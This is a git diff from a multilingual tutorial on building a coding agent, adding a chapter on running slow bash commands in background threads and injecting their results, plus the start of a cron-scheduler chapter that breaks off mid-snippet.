種**のバックグラウンドタスク(`Task.ts:7-13`)を定義:`local_bash`、`local_agent`、`remote_agent`、`in_process_teammate`、`local_workflow`、`monitor_mcp`、`dream`。それぞれ独自の登録、ライフサイクル、通知機構を持つ。 + +### 四、通知注入:コマンドキュー + +バックグラウンドタスク完了後、`enqueueTaskNotification`(`utils/task/framework.ts:267`)または `enqueuePendingNotification`(`messageQueueManager.ts`)を通じて**共有コマンドキュー**にエンキュー。通知形式は構造化 XML: + +```xml + + completed + Background command "npm test" completed (exit code 0) + +``` + +優先度は `next` > `later`(`messageQueueManager.ts`)。バックグラウンドタスクはデフォルトで `later`(ユーザー入力をブロックしない)。消費点は `query.ts:1566-1593`。 + +### 五、停滞ウォッチドッグ + +バックグラウンド bash タスクにはウォッチドッグがある(`LocalShellTask.tsx` L24-25 定数, L59-98 ロジック) — 出力の停滞を定期的にチェックし、45 秒間増加がない場合にインタラクティブなプロンプト(`(y/n)` など)を検出。バックグラウンドタスクが応答待ちのインタラクティブダイアログでスタックするのを防止。 + +### 六、同時実行制限 + +フォアグラウンドツール呼び出し:`CLAUDE_CODE_MAX_TOOL_USE_CONCURRENCY`(デフォルト 10 個の同時実行安全ツール)。バックグラウンド bash タスク:ハードリミットなし — それらは独立したサブプロセス。 + +
+ + diff --git a/s13_background_tasks/README.md b/s13_background_tasks/README.md new file mode 100644 index 000000000..ea6d3307d --- /dev/null +++ b/s13_background_tasks/README.md @@ -0,0 +1,217 @@ +# s13: Background Tasks — 慢操作放后台,Agent 继续思考 + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s11 → s12 → `s13` → [s14](../s14_cron_scheduler/) → s15 → ... → s19 +> *"慢操作丢后台, agent 继续思考"* — 后台线程跑命令, 完成后注入通知。 +> +> **Harness 层**: 后台 — 异步执行, 不阻塞思考。 + +--- + +## 问题 + +你用过洗衣机吗?把衣服扔进去,按下启动,然后去干别的——做饭、回消息、看论文。30 分钟后洗衣机"滴滴滴"提醒你:好了。你不会站在洗衣机前面干等 30 分钟。 + +Agent 的 bash 工具也一样。`pip install torch` 要 10 分钟,`npm run build` 要 3 分钟。这些命令一跑,Agent 就在等 bash 工具返回——它没法利用这段时间规划下一步、处理别的任务。 + +读文件是毫秒级,不等。`git status` 一秒内返回,不等。但 `npm install`?分钟级。Agent 等 10 分钟,什么都不做。**同步执行让 Agent 在慢操作上浪费了本可以用来思考和规划的时间。** + +--- + +## 解决方案 + +![Background Tasks Overview](images/background-tasks-overview.svg) + +s12 的循环、任务系统、prompt 组装全部保留。唯一的变动:慢操作扔到后台线程,Agent 继续跑循环,后台完成后把结果注入到对话里。 + +同步 vs 后台: + +| | 同步 (s12) | 后台 (s13) | +|---|---|---| +| 慢操作 | Agent 干等 | 后台线程执行 | +| Agent 空闲 | 是 | 否,继续思考 | +| 结果 | 立即返回 | 下轮注入通知 | +| 判断标准 | — | `is_slow_operation` 启发式 | + +--- + +## 工作原理 + +### is_slow_operation: 快慢判断 + +不是所有操作都放后台。读文件、`git status` 这些毫秒级操作,同步执行比开线程更快。只有**可能超过 30 秒**的操作才值得丢后台: + +```python +def is_slow_operation(tool_name: str, tool_input: dict) -> bool: + if tool_name != "bash": + return False + cmd = tool_input.get("command", "").lower() + slow_keywords = ["install", "build", "test", "deploy", "compile", + "docker build", "pip install", "npm install", + "cargo build", "pytest", "make"] + return any(kw in cmd for kw in slow_keywords) +``` + +教学版用关键词启发式。CC 的判断更精细——看命令的预期执行时间、历史运行时间、甚至用户配置的超时阈值。 + +### run_in_background: 后台执行 + +把工具调用包装成一个 worker 函数,扔到 `threading.Thread(daemon=True)` 里执行。结果存到 `background_results` 字典,用 `threading.Lock` 保护: + +```python +background_results: dict[str, str] = {} +background_lock = threading.Lock() + +def run_in_background(tool_use_id: str, fn, *args): + 
def worker(): + result = fn(*args) + with background_lock: + background_results[tool_use_id] = result + thread = threading.Thread(target=worker, daemon=True) + thread.start() +``` + +`daemon=True` 确保 Agent 进程退出时线程跟着退出,不会卡住。 + +### collect_background_results: 收集结果 + +每轮循环结束时,检查后台任务有没有完成的: + +```python +def collect_background_results() -> dict[str, str]: + with background_lock: + ready = dict(background_results) + background_results.clear() + return ready +``` + +把完成的结果清出字典,返回给调用方。没完成的——下轮再检查。 + +### 循环中的集成 + +agent_loop 里,工具执行分两条路: + +```python +for block in response.content: + if block.type != "tool_use": + continue + if is_slow_operation(block.name, block.input): + run_in_background(block.id, execute_tool, block) + results.append({"type": "tool_result", + "tool_use_id": block.id, + "content": "[Running in background...]"}) + else: + output = execute_tool(block) + results.append({"type": "tool_result", + "tool_use_id": block.id, "content": output}) + +# 注入已完成的后台结果 +bg_results = collect_background_results() +if bg_results: + messages.append({"role": "user", "content": [ + {"type": "tool_result", "tool_use_id": tid, "content": out} + for tid, out in bg_results.items()]}) +``` + +慢操作先回一个占位符 `[Running in background...]`,LLM 知道这个命令还在跑,可以先做别的事。后台完成后,结果作为新的 `tool_result` 注入到 messages 里——LLM 下一轮就能看到。 + +### 合起来跑 + +``` +Turn 1: + LLM → bash "npm install" (slow) + → dispatch to background thread + → return "[Running in background...]" + → LLM: "OK, I'll check the install result later. Let me also read the config." + +Turn 2: + LLM → read_file "package.json" (fast, sync) + → return file content + → collect_background_results: npm install done! 
inject result + → LLM sees both: config file + install result +``` + +Agent 没干等——npm install 跑后台的时候,它去读了配置文件。 + +--- + +## 相对 s12 的变更 + +| 组件 | 之前 (s12) | 之后 (s13) | +|------|-----------|-----------| +| 执行模型 | 全部同步 | 慢操作后台线程 + 通知注入 | +| 新模块 | — | `is_slow_operation`, `run_in_background`, `collect_background_results` | +| 新类型 | — | `background_results: dict`, `background_lock: Lock` | +| 循环行为 | 工具串行执行 | 慢操作异步,快操作同步,结果每轮收集 | +| 占位符 | — | `[Running in background...]` | +| 工具 | 7 (s12) | 7(不变,执行策略变了) | + +--- + +## 试一下 + +```sh +cd learn-claude-code +python s13_background_tasks/code.py +``` + +试试这些 prompt: + +1. `Run pip list AND find all Python files in this directory` +2. `Run npm install and while waiting, read package.json` +3. `Create a task to setup the project, then run pip list in the background` + +观察重点:慢操作(pip/npm)有没有被送到后台?Agent 有没有在等的同时做别的事?后台结果有没有被注入回来? + +--- + +## 接下来 + +后台任务解决了"慢操作不阻塞"。但如果想**定时**做某件事呢?比如"每天早上 9 点跑测试"、"每 5 分钟检查一次服务器状态"? + +s14 Cron Scheduler → 给 Agent 装一个闹钟。 + +
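一个值得注意的边界:教学版把后台结果作为新的 `tool_result` 注入,复用了旧的 `tool_use_id`。真实的 Anthropic Messages API 要求每个 `tool_result` 出现在紧跟对应 `tool_use` 的那条 user 消息里,迟到或重复的 `tool_use_id` 会被拒绝。生产实现通常把后台结果包装成普通文本注入(CC 自己用的就是结构化 XML 文本通知,见下方源码分析)。下面是一个示意写法——`make_bg_notification` 是假设的辅助函数,并非本章 code.py 的一部分:

```python
def make_bg_notification(tool_use_id: str, output: str) -> dict:
    """把后台结果包装成普通文本块,避免复用旧 tool_use_id 被 API 拒绝。"""
    text = (f"[Background task {tool_use_id} completed]\n"
            f"{output}")
    return {"type": "text", "text": text}

# 注入时追加到当轮的 tool_result 列表,保持同一条 user 消息:
#   results.extend(make_bg_notification(tid, out)
#                  for tid, out in bg_results.items())
```

user 消息的 content 可以混合 `tool_result` 块和 `text` 块,所以这种写法既不破坏当轮工具调用的配对,也能把后台结果带给 LLM。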
+深入 CC 源码 + +> 以下基于 CC 源码 `query.ts`(211, 1054-1060, 1411-1482 行)、`services/toolUseSummary/toolUseSummaryGenerator.ts`(L15 prompt 文本)、`LocalShellTask.tsx`(L24-25 常量, L59-98 看门狗逻辑)、`messageQueueManager.ts`(通知队列)、`utils/task/framework.ts`(L267 `enqueueTaskNotification`)的完整分析。 + +### 一、pendingToolUseSummary:Haiku 后台生成 + +CC 在每批工具执行完后,启动一个**Haiku side-query** 生成工具使用摘要。发起代码在 `query.ts:1411-1482`,prompt 文本定义在 `services/toolUseSummary/toolUseSummaryGenerator.ts:15`(变量名 `TOOL_USE_SUMMARY_SYSTEM_PROMPT`)。提示是 "Write a short summary label... think git-commit-subject, not sentence"——过去时态,约 30 字符。 + +Haiku 摘要(~1s)在主模型流式生成(5-30s)期间完成。下一轮开始前,把摘要 yield 出去。SDK 消费这些摘要做移动端进度展示。 + +### 二、线程模型:没有真正的线程 + +CC 运行在 Node.js/Bun 单线程事件循环中。"后台"只是 "不 await"。`ShellCommand.background(taskId)` 把 stdout/stderr 重定向到文件,让进程独立运行。 + +### 三、七种后台任务类型 + +CC 定义了 **7 种**后台任务(`Task.ts:7-13`):`local_bash`、`local_agent`、`remote_agent`、`in_process_teammate`、`local_workflow`、`monitor_mcp`、`dream`。每种有自己的注册、生命周期和通知机制。 + +### 四、通知注入:命令队列 + +后台任务完成后通过 `enqueueTaskNotification`(`utils/task/framework.ts:267`)或 `enqueuePendingNotification`(`messageQueueManager.ts`)入队到**共享命令队列**。通知格式是结构化的 XML: + +```xml + + completed + Background command "npm test" completed (exit code 0) + +``` + +优先级分 `next` > `later`(`messageQueueManager.ts`)。后台任务默认 `later`(不阻塞用户输入)。消费点在 `query.ts:1566-1593`。 + +### 五、停滞看门狗 + +后台 bash 任务有一个看门狗(`LocalShellTask.tsx` L24-25 常量, L59-98 逻辑)——定期检查输出是否停滞,45 秒无增长后检测交互式提示(`(y/n)` 等),防止后台任务卡在无人响应的交互式对话框。 + +### 六、并发限制 + +前台工具调用:`CLAUDE_CODE_MAX_TOOL_USE_CONCURRENCY`(默认 10 个并发安全工具)。后台 bash 任务:没有硬性限制——它们是独立的子进程。 + +
+ + diff --git a/s13_background_tasks/code.py b/s13_background_tasks/code.py new file mode 100644 index 000000000..2d8ed345c --- /dev/null +++ b/s13_background_tasks/code.py @@ -0,0 +1,418 @@ +#!/usr/bin/env python3 +""" +s13: Background Tasks — thread-based async execution + notification injection. + +Run: python s13_background_tasks/code.py +Need: pip install anthropic python-dotenv + .env with ANTHROPIC_API_KEY + +Changes from s12: + - threading.Thread for background execution + - background_results dict + threading.Lock for thread-safe storage + - is_slow_operation: heuristic (timeout > 30s → background) + - run_in_background: dispatch to daemon thread + - collect_background_results: gather completed results, clear dict + - agent_loop: slow ops → background + placeholder, then inject results + +ASCII flow: + messages → prompt → LLM → [slow?] → background thread → placeholder + ↓ ↓ (done) + ← collect results ← inject tool_result + [fast?] → sync execute → tool_result → loop +""" + +import os, subprocess, json, time, random, threading +from pathlib import Path +from dataclasses import dataclass, asdict + +try: + import readline + readline.parse_and_bind('set bind-tty-special-chars off') +except ImportError: + pass + +from anthropic import Anthropic +from dotenv import load_dotenv + +load_dotenv(override=True) +if os.getenv("ANTHROPIC_BASE_URL"): + os.environ.pop("ANTHROPIC_AUTH_TOKEN", None) + +WORKDIR = Path.cwd() +client = Anthropic(base_url=os.getenv("ANTHROPIC_BASE_URL")) +MODEL = os.environ["MODEL_ID"] + +# ── Task System (from s12, unchanged) ── + +TASKS_DIR = WORKDIR / ".tasks" +TASKS_DIR.mkdir(exist_ok=True) + + +@dataclass +class Task: + id: str + subject: str + description: str + status: str # pending | in_progress | completed + owner: str | None + blockedBy: list[str] + + +def _task_path(task_id: str) -> Path: + return TASKS_DIR / f"{task_id}.json" + + +def create_task(subject: str, description: str = "", + blockedBy: list[str] | None = None) -> Task: 
+ task = Task( + id=f"task_{int(time.time())}_{random.randint(0, 9999):04d}", + subject=subject, description=description, + status="pending", owner=None, + blockedBy=blockedBy or [], + ) + save_task(task) + return task + + +def save_task(task: Task): + _task_path(task.id).write_text(json.dumps(asdict(task), indent=2)) + + +def load_task(task_id: str) -> Task: + return Task(**json.loads(_task_path(task_id).read_text())) + + +def list_tasks() -> list[Task]: + return [Task(**json.loads(p.read_text())) + for p in sorted(TASKS_DIR.glob("task_*.json"))] + + +def can_start(task_id: str) -> bool: + task = load_task(task_id) + return all(load_task(d).status == "completed" for d in task.blockedBy) + + +def claim_task(task_id: str, owner: str = "agent") -> str: + task = load_task(task_id) + if task.status != "pending": + return f"Task {task_id} is {task.status}, cannot claim" + if not can_start(task_id): + deps = [d for d in task.blockedBy if load_task(d).status != "completed"] + return f"Blocked by: {deps}" + task.owner = owner + task.status = "in_progress" + save_task(task) + print(f" \033[36m[claim] {task.subject} → in_progress (owner: {owner})\033[0m") + return f"Claimed {task.id} ({task.subject})" + + +def complete_task(task_id: str) -> str: + task = load_task(task_id) + if task.status != "in_progress": + return f"Task {task_id} is {task.status}, cannot complete" + task.status = "completed" + save_task(task) + unblocked = [t.subject for t in list_tasks() + if t.status == "pending" and t.blockedBy and can_start(t.id)] + print(f" \033[32m[complete] {task.subject} ✓\033[0m") + msg = f"Completed {task.id} ({task.subject})" + if unblocked: + msg += f"\nUnblocked: {', '.join(unblocked)}" + print(f" \033[33m[unblocked] {', '.join(unblocked)}\033[0m") + return msg + + +# ── Prompt Assembly (from s10, unchanged) ── + +PROMPT_SECTIONS = { + "identity": "You are a coding agent. 
Act, don't explain.", + "tools": "Available tools: bash, read_file, write_file, " + "create_task, list_tasks, claim_task, complete_task.", + "workspace": f"Working directory: {WORKDIR}", + "planning": "For multi-step tasks, use create_task to break work " + "into subtasks with blockedBy dependencies.", + "skills": "Skills are available on demand.", + "memory": "Relevant memories from previous sessions are provided below.", +} + + +def assemble_system_prompt(context: dict) -> str: + sections = [PROMPT_SECTIONS["identity"], + PROMPT_SECTIONS["tools"], + PROMPT_SECTIONS["workspace"]] + if context.get("has_todos"): + sections.append(PROMPT_SECTIONS["planning"]) + if context.get("has_skills"): + sections.append(PROMPT_SECTIONS["skills"]) + if context.get("memories"): + sections.append(f"Relevant memories:\n{context['memories']}") + return "\n\n".join(sections) + + +_last_context_hash, _last_prompt = None, None + + +def get_system_prompt(context: dict) -> str: + global _last_context_hash, _last_prompt + h = hash(frozenset(context.items())) + if h == _last_context_hash and _last_prompt: + return _last_prompt + _last_context_hash, _last_prompt = h, assemble_system_prompt(context) + return _last_prompt + + +# ── Tools ── + +def safe_path(p: str) -> Path: + path = (WORKDIR / p).resolve() + if not path.is_relative_to(WORKDIR): + raise ValueError(f"Path escapes workspace: {p}") + return path + + +def run_bash(command: str) -> str: + try: + r = subprocess.run(command, shell=True, cwd=WORKDIR, + capture_output=True, text=True, timeout=120) + out = (r.stdout + r.stderr).strip() + return out[:50000] if out else "(no output)" + except subprocess.TimeoutExpired: + return "Error: Timeout (120s)" + + +def run_read(path: str, limit: int | None = None) -> str: + try: + lines = safe_path(path).read_text().splitlines() + if limit and limit < len(lines): + lines = lines[:limit] + [f"... 
({len(lines) - limit} more lines)"] + return "\n".join(lines) + except Exception as e: + return f"Error: {e}" + + +def run_write(path: str, content: str) -> str: + try: + fp = safe_path(path) + fp.parent.mkdir(parents=True, exist_ok=True) + fp.write_text(content) + return f"Wrote {len(content)} bytes to {path}" + except Exception as e: + return f"Error: {e}" + + +def run_create_task(subject: str, description: str = "", + blockedBy: list[str] | None = None) -> str: + task = create_task(subject, description, blockedBy) + deps = f" (blockedBy: {', '.join(blockedBy)})" if blockedBy else "" + print(f" \033[34m[create] {task.subject}{deps}\033[0m") + return f"Created {task.id}: {task.subject}{deps}" + + +def run_list_tasks() -> str: + tasks = list_tasks() + if not tasks: + return "No tasks. Use create_task to add some." + lines = [] + for t in tasks: + icon = {"pending": "○", "in_progress": "●", + "completed": "✓"}.get(t.status, "?") + deps = f" (blockedBy: {', '.join(t.blockedBy)})" if t.blockedBy else "" + owner = f" [{t.owner}]" if t.owner else "" + lines.append(f" {icon} {t.id}: {t.subject} " + f"[{t.status}]{owner}{deps}") + return "\n".join(lines) + + +def run_claim_task(task_id: str) -> str: + return claim_task(task_id, owner="agent") + + +def run_complete_task(task_id: str) -> str: + return complete_task(task_id) + + +TOOLS = [ + {"name": "bash", "description": "Run a shell command.", + "input_schema": {"type": "object", + "properties": {"command": {"type": "string"}}, + "required": ["command"]}}, + {"name": "read_file", "description": "Read file contents.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}, + "limit": {"type": "integer"}}, + "required": ["path"]}}, + {"name": "write_file", "description": "Write content to a file.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}, + "content": {"type": "string"}}, + "required": ["path", "content"]}}, + {"name": "create_task", + "description": "Create 
a new task with optional blockedBy dependencies.", + "input_schema": {"type": "object", + "properties": { + "subject": {"type": "string"}, + "description": {"type": "string"}, + "blockedBy": {"type": "array", + "items": {"type": "string"}}}, + "required": ["subject"]}}, + {"name": "list_tasks", + "description": "List all tasks with status, owner, and dependencies.", + "input_schema": {"type": "object", "properties": {}, + "required": []}}, + {"name": "claim_task", + "description": "Claim a pending task.", + "input_schema": {"type": "object", + "properties": {"task_id": {"type": "string"}}, + "required": ["task_id"]}}, + {"name": "complete_task", + "description": "Complete an in-progress task.", + "input_schema": {"type": "object", + "properties": {"task_id": {"type": "string"}}, + "required": ["task_id"]}}, +] + +TOOL_HANDLERS = { + "bash": run_bash, "read_file": run_read, "write_file": run_write, + "create_task": run_create_task, "list_tasks": run_list_tasks, + "claim_task": run_claim_task, "complete_task": run_complete_task, +} + + +# ── Background Tasks (s13 new) ── + +SLOW_THRESHOLD_S = 30 + +background_results: dict[str, str] = {} +background_lock = threading.Lock() +_background_threads: dict[str, threading.Thread] = {} + + +def is_slow_operation(tool_name: str, tool_input: dict) -> bool: + """Heuristic: commands likely to take > 30s go to background.""" + if tool_name != "bash": + return False + cmd = tool_input.get("command", "").lower() + slow_keywords = ["install", "build", "test", "deploy", "compile", + "docker build", "pip install", "npm install", + "cargo build", "pytest", "make"] + return any(kw in cmd for kw in slow_keywords) + + +def execute_tool(block) -> str: + """Execute a tool call block, return output.""" + handler = TOOL_HANDLERS.get(block.name) + if handler: + return handler(**block.input) + return f"Unknown tool: {block.name}" + + +def run_in_background(tool_use_id: str, fn, *args): + """Run fn in a daemon thread, store result in 
background_results.""" + def worker(): + result = fn(*args) + with background_lock: + background_results[tool_use_id] = result + thread = threading.Thread(target=worker, daemon=True) + _background_threads[tool_use_id] = thread + thread.start() + print(f" \033[33m[background] dispatched to thread {tool_use_id[:12]}...\033[0m") + + +def collect_background_results() -> dict[str, str]: + """Collect completed background results, clear from dict.""" + with background_lock: + ready = dict(background_results) + background_results.clear() + if ready: + for tid in ready: + print(f" \033[32m[background done] {tid[:12]}... " + f"({len(ready[tid])} chars)\033[0m") + return ready + + +# ── Context ── + +def update_context(context: dict, messages: list) -> dict: + text = " ".join(str(m.get("content", ""))[:200] + for m in messages[-6:]).lower() + return {"has_todos": "task" in text or "todo" in text, + "has_skills": "skill" in text, + "memories": context.get("memories", "")} + + +# ── Agent Loop ── + +def agent_loop(messages: list, context: dict): + system = get_system_prompt(context) + while True: + try: + response = client.messages.create( + model=MODEL, system=system, messages=messages, + tools=TOOLS, max_tokens=8000) + except Exception as e: + messages.append({"role": "assistant", "content": [ + {"type": "text", + "text": f"[Error] {type(e).__name__}: {e}"}]}) + return + + messages.append({"role": "assistant", "content": response.content}) + if response.stop_reason != "tool_use": + return + + results = [] + for block in response.content: + if block.type != "tool_use": + continue + print(f"\033[36m> {block.name}\033[0m") + + if is_slow_operation(block.name, block.input): + # Slow operation → background thread + run_in_background(block.id, execute_tool, block) + results.append({"type": "tool_result", + "tool_use_id": block.id, + "content": "[Running in background...] " + f"Dispatched to background thread. 
" + f"I'll check the result next turn."}) + else: + # Fast operation → synchronous + output = execute_tool(block) + print(str(output)[:300]) + results.append({"type": "tool_result", + "tool_use_id": block.id, + "content": output}) + + # Inject completed background results + bg_results = collect_background_results() + if bg_results: + bg_content = [] + for tid, output in bg_results.items(): + bg_content.append({"type": "tool_result", + "tool_use_id": tid, + "content": output}) + messages.append({"role": "user", "content": bg_content}) + print(f" \033[32m[inject] {len(bg_content)} background " + f"result(s) injected\033[0m") + + messages.append({"role": "user", "content": results}) + context = update_context(context, messages) + system = get_system_prompt(context) + + +if __name__ == "__main__": + print("s13: background tasks") + print("Enter a question, press Enter to send. Type q to quit.\n") + history = [] + context = {"has_todos": False, "has_skills": False, "memories": ""} + while True: + try: + query = input("\033[36ms13 >> \033[0m") + except (EOFError, KeyboardInterrupt): + break + if query.strip().lower() in ("q", "exit", ""): + break + history.append({"role": "user", "content": query}) + agent_loop(history, context) + context = update_context(context, history) + for block in history[-1]["content"]: + if getattr(block, "type", None) == "text": + print(block.text) + print() diff --git a/s13_background_tasks/images/background-tasks-overview.en.svg b/s13_background_tasks/images/background-tasks-overview.en.svg new file mode 100644 index 000000000..830ffb90e --- /dev/null +++ b/s13_background_tasks/images/background-tasks-overview.en.svg @@ -0,0 +1,105 @@ + + + + + + + + + + + + + + + + + + + Background Tasks — Slow ops to background, Agent keeps thinking + + + + s12 retained + + s13 new + + + + messages + + + + + prompt + cache + (s10-s12) + + + + + LLM call + (s11 retry) + + + + + + TOOL DISPATCH + fast? → sync execute (s12) + slow? 
→ run_in_background ★ + + + + + + + Background thread execution + run_in_background(tool_use_id, fn, *args) + threading.Thread(target=worker, daemon=True) + result → background_results[id] (threading.Lock protected) + + + + slow op + + + + Notification injection + collect_background_results() check each turn + completed → tool_result inject into messages + pending → "[Running in background...]" placeholder + + + + + + + Heuristic: + + fast + read_file · git status · glob + + slow + npm install · pip install · pytest (timeout > 30s) + + + + s12 sync blocking + + think + + waiting for bash 3min... + + continue + Total ~3min, Agent idled for 3 minutes + + + s13 background execution + + think + + keep doing other work + + notification: result ready + Total ~3min, but Agent wasn't idle + \ No newline at end of file diff --git a/s13_background_tasks/images/background-tasks-overview.ja.svg b/s13_background_tasks/images/background-tasks-overview.ja.svg new file mode 100644 index 000000000..207eec47b --- /dev/null +++ b/s13_background_tasks/images/background-tasks-overview.ja.svg @@ -0,0 +1,105 @@ + + + + + + + + + + + + + + + + + + + Background Tasks — 遅い操作はバックグラウンドへ、Agent は考え続ける + + + + s12 維持 + + s13 新規 + + + + messages + + + + + prompt + cache + (s10-s12) + + + + + LLM call + (s11 retry) + + + + + + TOOL DISPATCH + fast? → 同期実行 (s12) + slow? → run_in_background ★ + + + + + + + バックグラウンドスレッド実行 + run_in_background(tool_use_id, fn, *args) + threading.Thread(target=worker, daemon=True) + 結果 → background_results[id] (threading.Lock で保護) + + + + slow op + + + + 通知注入 + collect_background_results() 毎ターン確認 + 完了 → tool_result を messages に注入 + 未完了 → "[Running in background...]" プレースホルダー + + + + + + + ヒューリスティック判定: + + fast + read_file · git status · glob + + slow + npm install · pip install · pytest (timeout > 30s) + + + + s12 同期ブロッキング + + 思考 + + bash 待ち 3分... 
+ + 継続 + 合計 ~3分、Agent は3分間待機 + + + s13 バックグラウンド実行 + + 思考 + + 別の作業を継続 + + 通知: 結果完了 + 合計 ~3分、Agent は遊ばず + diff --git a/s13_background_tasks/images/background-tasks-overview.svg b/s13_background_tasks/images/background-tasks-overview.svg new file mode 100644 index 000000000..ac6dff0ac --- /dev/null +++ b/s13_background_tasks/images/background-tasks-overview.svg @@ -0,0 +1,105 @@ + + + + + + + + + + + + + + + + + + + Background Tasks — 慢操作丢后台,Agent 继续思考 + + + + s12 保留 + + s13 新增 + + + + messages + + + + + prompt + cache + (s10-s12) + + + + + LLM call + (s11 retry) + + + + + + TOOL DISPATCH + fast? → 同步执行 (s12) + slow? → run_in_background ★ + + + + + + + 后台线程执行 + run_in_background(tool_use_id, fn, *args) + threading.Thread(target=worker, daemon=True) + 结果 → background_results[id] (threading.Lock 保护) + + + + slow op + + + + 通知注入 + collect_background_results() 每轮检查 + 已完成 → tool_result 注入 messages + 未完成 → "[Running in background...]" 占位 + + + + + + + 启发式判断: + + fast + read_file · git status · glob + + slow + npm install · pip install · pytest (timeout > 30s) + + + + s12 同步阻塞 + + 思考 + + 等 bash 3 分钟... + + 继续 + 总耗时 ~3min,Agent 空 etc. 等了 3 分钟 + + + s13 后台执行 + + 思考 + + 继续做别的事 + + 通知: 结果来了 + 总耗时 ~3min,但 Agent 没闲着 + diff --git a/s14_cron_scheduler/README.en.md b/s14_cron_scheduler/README.en.md new file mode 100644 index 000000000..e35a0f3e1 --- /dev/null +++ b/s14_cron_scheduler/README.en.md @@ -0,0 +1,263 @@ +# s14: Cron Scheduler — Fire on schedule, no human pushing needed + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s12 → s13 → `s14` → [s15](../s15_agent_teams/) → s16 → ... → s19 +> *"Fire on schedule, no human pushing needed"* — cron scheduling, durable or session-level. +> +> **Harness layer**: Scheduling — Agent acts on its own timetable. + +--- + +## The Problem + +An alarm clock doesn't need you watching it to go off. You set it for 7:00 AM, and it rings on its own — whether you're sleeping, showering, or cooking, it rings regardless. 
+ +s13 lets the Agent execute slow operations in the background — but every operation is still manually triggered by you. You say something, the Agent does something. "Run tests every morning at 9 AM", "Check CI status every 30 minutes" — these recurring tasks shouldn't require a human to push them each time. + +--- + +## The Solution + +![Cron Scheduler Overview](images/cron-scheduler-overview.en.svg) + +s13's background threads, task system, and prompt assembly are fully preserved. The addition: **a standalone cron scheduler thread** — running in a daemon thread, polling every second, and queuing matching jobs into `cron_queue`. The Agent's main loop consumes triggered jobs from the queue and injects them into the conversation. + +Manual vs. Scheduled: + +| | Manual Trigger (s13) | Scheduled Trigger (s14) | +|---|---|---| +| Triggered by | User input | Scheduler thread, automatically | +| Trigger timing | Anytime | Specified by cron expression | +| Human involvement required | Yes | No | +| Persistence | — | Durable, survives restarts | + +--- + +## How It Works + +### CronJob: Data Structure + +Each cron task is a `CronJob` object: + +```python +@dataclass +class CronJob: + id: str + cron: str # "0 9 * * *" (5-field cron expression) + prompt: str # Message injected to the Agent when triggered + recurring: bool # True=recurring, False=one-shot + durable: bool # True=write to disk, persists across sessions +``` + +Cron expressions — 5-field, the format Unix has used for 50 years: + +``` +Minute Hour Day Month Day-of-week + * * * * * Every minute + 0 9 * * * Every day at 9:00 AM + */5 * * * * Every 5 minutes + 0 9 * * 1-5 Weekdays at 9:00 AM +``` + +Supports `*`, `*/N`, `N`, `N-M`, `N,M,...`. 
+ +### cron_matches: 5-Field Matching + +Each polling cycle compares the current time against every job's cron expression: + +```python +def _cron_field_matches(field: str, value: int) -> bool: + if field == "*": + return True + if field.startswith("*/"): + step = int(field[2:]) + return step > 0 and value % step == 0 + if "," in field: + return any(_cron_field_matches(f.strip(), value) + for f in field.split(",")) + if "-" in field: + lo, hi = field.split("-", 1) + return int(lo) <= value <= int(hi) + return value == int(field) + +def cron_matches(cron_expr: str, dt: datetime) -> bool: + fields = cron_expr.strip().split() + if len(fields) != 5: + return False + minute, hour, dom, month, dow = fields + dow_val = (dt.weekday() + 1) % 7 # Python Monday=0 → cron Sunday=0 + return all([ + _cron_field_matches(minute, dt.minute), + _cron_field_matches(hour, dt.hour), + _cron_field_matches(dom, dt.day), + _cron_field_matches(month, dt.month), + _cron_field_matches(dow, dow_val), + ]) +``` + +Field-by-field matching — all 5 fields must pass for a match. 
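A quick way to sanity-check the matcher is to feed it fixed datetimes. Both functions are re-declared here verbatim so the snippet runs standalone:

```python
from datetime import datetime

def _cron_field_matches(field: str, value: int) -> bool:
    if field == "*":
        return True
    if field.startswith("*/"):
        step = int(field[2:])
        return step > 0 and value % step == 0
    if "," in field:
        return any(_cron_field_matches(f.strip(), value)
                   for f in field.split(","))
    if "-" in field:
        lo, hi = field.split("-", 1)
        return int(lo) <= value <= int(hi)
    return value == int(field)

def cron_matches(cron_expr: str, dt: datetime) -> bool:
    fields = cron_expr.strip().split()
    if len(fields) != 5:
        return False
    minute, hour, dom, month, dow = fields
    dow_val = (dt.weekday() + 1) % 7  # Python Monday=0 → cron Sunday=0
    return all([
        _cron_field_matches(minute, dt.minute),
        _cron_field_matches(hour, dt.hour),
        _cron_field_matches(dom, dt.day),
        _cron_field_matches(month, dt.month),
        _cron_field_matches(dow, dow_val),
    ])

# 2026-04-01 is a Wednesday, 2026-04-04 a Saturday
assert cron_matches("0 9 * * 1-5", datetime(2026, 4, 1, 9, 0))      # weekday 09:00 → fires
assert not cron_matches("0 9 * * 1-5", datetime(2026, 4, 4, 9, 0))  # Saturday → no
assert cron_matches("*/5 * * * *", datetime(2026, 4, 1, 12, 35))    # :35 is a multiple of 5
assert not cron_matches("not a cron expr", datetime(2026, 4, 1, 0, 0))  # not 5 fields → False
```

Note that `*/N` here means "value divisible by N", which matches minutes like `:00, :05, :10, ...` — the same simplification the chapter's code makes.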
+
+### Standalone Scheduler Thread: Polling Every Second
+
+**This is the biggest difference from previous chapters**: the scheduler runs in its own daemon thread, independent of whether `agent_loop` is executing:
+
+```python
+def cron_scheduler_loop():
+    """Independent daemon thread: poll every 1s, fire matching jobs."""
+    while True:
+        time.sleep(1)
+        now = datetime.now()
+        # Include the date so a job firing daily at the same hh:mm
+        # is not deduplicated against yesterday's run
+        minute_marker = (now.date(), now.hour, now.minute)
+        with cron_lock:
+            for job in list(scheduled_jobs.values()):
+                if cron_matches(job.cron, now):
+                    if _last_fired.get(job.id) != minute_marker:
+                        cron_queue.append(job)
+                        _last_fired[job.id] = minute_marker
+                        if not job.recurring:
+                            scheduled_jobs.pop(job.id, None)
+                            if job.durable:
+                                save_durable_jobs()
+
+threading.Thread(target=cron_scheduler_loop, daemon=True).start()
+```
+
+Key design decisions:
+- **Independent of agent_loop**: The scheduler runs in the background even when the user isn't typing
+- **minute_marker prevents duplicates**: The loop polls every second (~60 checks per minute) but cron granularity is per-minute, so each job fires at most once per matching minute; including the date in the marker lets a daily job fire again the next day
+- **One-shot jobs**: Automatically removed from `scheduled_jobs` after firing
+
+### agent_loop: Consumer Side
+
+`agent_loop` doesn't check the time — it only pulls triggered jobs from `cron_queue` and injects them into messages:
+
+```python
+# Before each LLM call, consume triggered cron jobs
+fired = consume_cron_queue()
+for job in fired:
